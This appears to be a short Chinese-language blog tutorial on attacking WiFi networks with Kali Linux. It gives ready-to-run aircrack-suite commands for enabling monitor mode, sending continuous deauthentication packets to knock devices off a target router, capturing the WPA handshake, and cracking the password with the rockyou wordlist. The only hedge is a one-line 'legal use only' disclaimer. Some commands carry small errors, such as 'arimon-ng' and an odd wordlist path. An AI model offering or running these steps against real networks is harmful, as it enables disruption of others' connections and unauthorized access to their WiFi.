基于Kali的WiFi攻击

仅限于合法用途,责任自负
Legal purpose only, do it at your own risk.

准备

  1. 检查网卡情况

在终端输入 ifconfig , 如果看到 wlan0 , 就进行下一步。

  1. 启动监控模式

用下面的命令启动设备:

1
arimon-ng start wlan0

然后在ifconfig的输出中,你就能看到名叫wlan0mon的设备。然后输入

1
airodump-ng wlan0mon

来启动监听。用下面的指令停止监听:

1
airmon-ng stop wlan0mon

断网攻击

扫出来目标设备之后,用ctrl+c停止扫描,然后再开个终端,输入

1
aireplay-ng -0 0 -a [BSSID] wlan0mon

然后回来这个终端,输入

1
airodump-ng -c [CH] --bssid [BSSID] -w ~/ wlan0mon

然后连接那个路由器WiFi的设备应该就会断联了。

破解密码

当你捕捉到这样的握手包 WPA handshake: [PACKAGE]时, Ctrl+c停止指令

然后输入

1
aircrack-ng -a2 -b [PACKAGE] -w [PATH-TO-PASS-DICTIONARY] ~/*.cap

Kali的自带字典一般在这: /fs/usr/share/wordlists/rockyou.txt.gz. 解压,然后把rockyou.txt的路径替换到上边,回车。然后应该就能获取到密码了。

作者

xeonds

发布于

2023-01-28

更新于

2024-05-13

许可协议

评论